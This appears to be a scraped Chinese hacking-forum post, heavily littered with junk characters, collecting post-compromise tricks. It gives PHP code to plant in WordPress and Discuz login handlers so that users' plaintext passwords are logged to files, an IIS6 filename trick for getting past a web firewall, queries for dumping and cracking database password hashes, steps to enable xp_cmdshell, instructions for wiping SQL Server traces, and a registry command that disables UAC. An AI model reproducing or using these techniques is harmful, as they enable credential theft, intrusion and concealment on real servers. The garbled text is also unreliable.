- }# [! U! F' v0 r+ B1 x+ i// log password: h# W- x3 ?2 I2 @* T
$log_user=$_POST['log'];! U/ {/ W$ O+ h) W, i. A& W
$log_pwd=$_POST['pwd'];
( F5 l+ G: Y8 D; x! F$log_ip=$_SERVER["REMOTE_ADDR"];
( B' b5 T! U) V3 h$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
! p7 s: W! e% a$ b0 h9 D$txt=$txt.”\r\n”;6 h* B% C7 S5 d& D* [! h
if($log_user&&$log_pwd&&$log_ip){- x' Q# l' ?: a" T0 W! t6 m
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
$ c, A5 @" H* f3 V, ^}
6 J& V# A9 ~6 Y! C; C+ R# P当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。+ h& J0 K' R6 Y' k8 l- C% v
就是搜索case ‘login’
: N% p. _- G5 Z* U# _在它下面直接插入即可,记录的密码生成在pwd.txt中,7 b9 s6 ?& z3 [& |; A; {* Y8 O
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) d! q0 ^& c' T4 k/ R0 d! V
利用II6文件解析漏洞绕过安全狗代码:
6 r0 s. s* C. V# v4 ~% U3 s5 q" };antian365.asp;antian365.jpg
+ H+ u) G4 K. {1 ]) I/ O" S% ~& v3 v& {/ W  Y+ F
各种类型数据库抓HASH破解最高权限密码!
9 @' ?- f! k# o! J1.sql server2000" p* }# {$ K. [3 T. W
SELECT password from master.dbo.sysxlogins where name='sa'4 _! C2 w3 R; R" Z  n+ }
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341$ Y( a& r& S& i' Q
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A# N: q$ Y7 I" _6 n& m5 j) d
; `1 e( U! p4 C: d) E3 N3 O
0×0100- constant header) i' S6 b' b/ q- a/ I# f; g8 J
34767D5C- salt
$ C) S+ i: X8 x  B' e7 c0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash, y* \# a- L4 t1 L
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
  @) w( I! T  O0 ycrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
6 e- M1 }4 Y- B9 h& |& ^1 qSQL server 2005:-
7 e5 l5 V4 s3 vSELECT password_hash FROM sys.sql_logins where name='sa'
9 v3 F- [# ~6 M0 d- f4 |' W. F0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
' v5 g, A! f7 M& A0×0100- constant header) d+ a9 b% E6 {2 y
993BF231-salt8 B, X# k: {, S/ T1 A$ W# R. t
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
! v, }8 ]  @3 A/ Hcrack case sensitive hash in cain, try brute force and dictionary based attacks.) f9 g! _% a! w  t2 g8 b$ Z$ h

/ F9 F2 X$ l- m$ L) w# X8 Qupdate:- following bernardo’s comments:-
0 U, v7 m3 I; L0 Zuse function fn_varbintohexstr() to cast password in a hex string.
4 Y5 \/ ]  `% ^- A. B$ |e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins; d3 `4 E- H& b8 U) H6 B

  A' N- C! b$ j& c  b4 H6 ~2 dMYSQL:-* L! t; |& M7 o3 @; `& f* {+ q
! L! x, N5 U# |: L
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.; Q7 ?) [. Y3 }8 Z
+ ?. X4 u7 v2 \3 i
*mysql  < 4.1, R- C& {; e7 c0 X& h& U2 u
1 W# w' q" O1 L; o
mysql> SELECT PASSWORD(‘mypass’);
& O7 X6 r9 R* A7 i% y+——————–+4 z" b4 Y( i/ r) g; G- j) q
| PASSWORD(‘mypass’) |
7 Z  f, C6 H: x& }6 `- I+——————–+2 b5 C( w( |& J
| 6f8c114b58f2ce9e   |
" z6 H5 X: S7 L+——————–+2 Y3 C8 o5 n) o# d9 {
+ e4 ]8 p# {8 J
*mysql >=4.1
, f6 }! x* R2 `$ P( S) c2 b# w7 H- z" A; F1 A" f: M! H
mysql> SELECT PASSWORD(‘mypass’);
) X0 [0 W" s+ l) J2 s, H! m4 t+——————————————-+: ~7 c# x' l5 Q/ @1 {# {
| PASSWORD(‘mypass’)                        |4 |6 X6 [; e6 C0 c1 B" s  ?7 V
+——————————————-+5 h* ]% ]$ N5 I  u0 Z
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+ a8 D  `3 n% _$ z: l) V! o
+——————————————-+
' v, a( D8 n8 T1 }! W7 {7 L9 ?) {  R) l; w. l" I  ?
Select user, password from mysql.user
' e) }* l' t$ a( X3 t$ eThe hashes can be cracked in ‘cain and abel’* \$ K7 N7 ~$ b2 j

8 m4 o" h) G( v# N% ]2 z. fPostgres:-
9 w4 G% E6 T$ z  {" r9 E$ FPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”). a; L3 i9 s5 G# V0 W
select usename, passwd from pg_shadow;
/ ]- K2 v0 ?4 S& R! z' j2 Ousename      |  passwd
; e# M+ y, a- P) Q$ s: h——————+————————————-' g+ C7 q7 C& r$ O% d  ?* d
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
, @, a, C# n" ause mdcrack to crack these hashes:-8 ]5 n: v# |  i$ q0 U4 v3 S5 w/ k8 O
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43968 n# t* `- C: y. ~1 t. }
7 c* }  s5 B0 k1 o
Oracle:-
( S& D% ]$ M  \5 K3 b# B8 Q5 Tselect name, password, spare4 from sys.user$9 g+ j/ ?% Z1 N4 ~% o5 K
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
) G- p6 Q. ^7 o7 j7 A6 nMore on Oracle later, i am a bit bored….
6 _# d/ j& c$ l/ q7 s& W  `/ }, V- L+ x! T% g

* }6 S( F) ^; D2 g* d  L* n在sql server2005/2008中开启xp_cmdshell
4 a  B1 B( _3 z4 s-- To allow advanced options to be changed.7 W8 ~, y5 p! t- k# H
EXEC sp_configure 'show advanced options', 1, _  H/ P7 h# k6 k" ?$ m$ N
GO
0 F) k% ]1 b- _% g$ q% r-- To update the currently configured value for advanced options.# k6 Z- V4 U  q: V3 g& v6 Z
RECONFIGURE
/ }/ C) M  b. k7 y- U1 wGO3 h2 a$ }4 m# ]2 x8 p; J
-- To enable the feature.& i2 y  G$ |0 t" }% b
EXEC sp_configure 'xp_cmdshell', 15 m8 q$ _3 i9 B5 n* H0 P$ g6 F
GO, g; ?( J: U# S0 H
-- To update the currently configured value for this feature.
# f; c' W/ g" D* e; fRECONFIGURE
* N! _8 D; E3 p0 s  oGO( a/ O% Y  L5 X
SQL 2008 server日志清除,在清楚前一定要备份。
0 y) ^$ I* Z. s; G7 w% N- c) a3 z' ]如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:* p1 O- _- O) \9 N. k2 M* f
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
' _, }6 v- A. J0 l/ z1 Y
" ]' n& x( z4 t/ e5 k对于SQL Server 2008以前的版本:
6 L" K' J$ h8 w1 |SQL Server 2005:8 x& {- @* q# C: [( o
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
! m8 ?* z& X3 s2 ~+ \( i1 ]( |/ H& OSQL Server 2000:
5 i% I. {0 }( a  {$ n清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
- u# ]) `. Q$ a( d9 T4 O8 r
( P* B2 f$ O* N1 `2 j本帖最后由 simeon 于 2013-1-3 09:51 编辑+ A7 [9 z. ]8 l2 {" _

, Q! w+ y/ G& R0 q
* k" l% I3 _+ l5 Y' xwindows 2008 文件权限修改
# L: W9 M1 {. D1 u$ H# m1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
$ o$ R: [1 \! w. n2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
5 ]; G, z/ ]  F  H' Z: B* i一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
9 V0 q( I+ j- i* y( q1 B/ }2 t3 o7 e" E0 l& i& m
Windows Registry Editor Version 5.00
: i% V! U3 n7 w. N[HKEY_CLASSES_ROOT\*\shell\runas]* h5 s! i  L' H4 ]; N
@="管理员取得所有权"/ K; q5 B0 L8 i% e# j& a
"NoWorkingDirectory"=""+ a, z2 y" `& H4 q% G  [
[HKEY_CLASSES_ROOT\*\shell\runas\command]
8 U( ]3 k* e# X; p2 t@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ [" s. h' x* A, u
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 ?) n8 T3 x; {& a/ Y9 e1 @2 M
[HKEY_CLASSES_ROOT\exefile\shell\runas2]) E$ L/ d  U% k, s% s( q
@="管理员取得所有权"9 X  H6 l, F" v% G
"NoWorkingDirectory"=""1 `  w6 ]2 R& O4 T3 X
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]) g7 L' I2 j4 K* @
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ t0 f4 W+ F- d9 k2 z: r
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. z! t/ ^/ u, S# G4 u, o9 x! g" K' y  Y1 l5 p
[HKEY_CLASSES_ROOT\Directory\shell\runas]# w- N* I8 V+ Y( f- p& B: \
@="管理员取得所有权"
+ ~% K1 u' \) O+ v* g; ~"NoWorkingDirectory"=""
' \* o# G3 v7 U8 c[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
( [! f; z1 ?$ K. b3 ]@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
, }3 [3 S9 n! v- j/ I$ K% J"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- z! v( n. f5 `5 e1 S, p* e" ~7 o8 _
. h% A" L9 K8 ~+ B0 b
win7右键“管理员取得所有权”.reg导入) S3 j+ G( K  Q" _8 p- D; _# k# @
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
( W2 d" e% @8 ~1、C:\Windows这个路径的“notepad.exe”不需要替换
2 s0 i% O1 j( I, b% c2、C:\Windows\System32这个路径的“notepad.exe”不需要替换4 p+ S4 B: c# A6 D" F! D( d
3、四个“notepad.exe.mui”不要管% V, H% s5 U  l0 i$ f
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
1 t5 H; }) y' O( n1 U$ A* x( H% C  fC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”8 M$ e8 }, n  Z
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
& v2 W$ \# t& E3 |9 d替换完之后回到桌面,新建一个txt文档打开看看是不是变了。& w8 p5 j! v- P1 \2 j
windows 2008中关闭安全策略:
( s3 f: t8 {) S$ m0 V" Areg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2 o( @( Y1 c1 G# x; A8 D. `修改uc_client目录下的client.php 在3 a  _% u/ {0 x. l7 V; r$ w, ]
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
! g" H4 L! K! S0 d( }2 a( \下加入如上代码,在网站./data/cache/目录下自动生成csslog.php) {' k. |5 Y( E- W5 V( N
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
+ _- ~2 I7 A2 ?if(getenv('HTTP_CLIENT_IP')) {
$ s' x) b. T( Q$onlineip = getenv('HTTP_CLIENT_IP');
6 p% \& [6 U7 |* h$ V} elseif(getenv('HTTP_X_FORWARDED_FOR')) {3 H' e, d( F0 s- G  R
$onlineip = getenv('HTTP_X_FORWARDED_FOR');& W6 ]7 P5 u) o  L0 v  x; d
} elseif(getenv('REMOTE_ADDR')) {- ?. A% L8 p' Z" I
$onlineip = getenv('REMOTE_ADDR');. f2 S3 u% n% W
} else {8 L  m$ ~0 G( L
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];+ m+ \- P7 r& j+ u
}
0 {: H/ P+ ~1 e% U+ m) |/ U. y     $showtime=date("Y-m-d H:i:s");4 t5 k3 T2 e$ {1 c3 i9 R$ q
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";; y  B8 y& X. i" O1 R2 k
    $handle=fopen('./data/cache/csslog.php','a+');
/ F) o' p2 W7 B2 q7 H    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表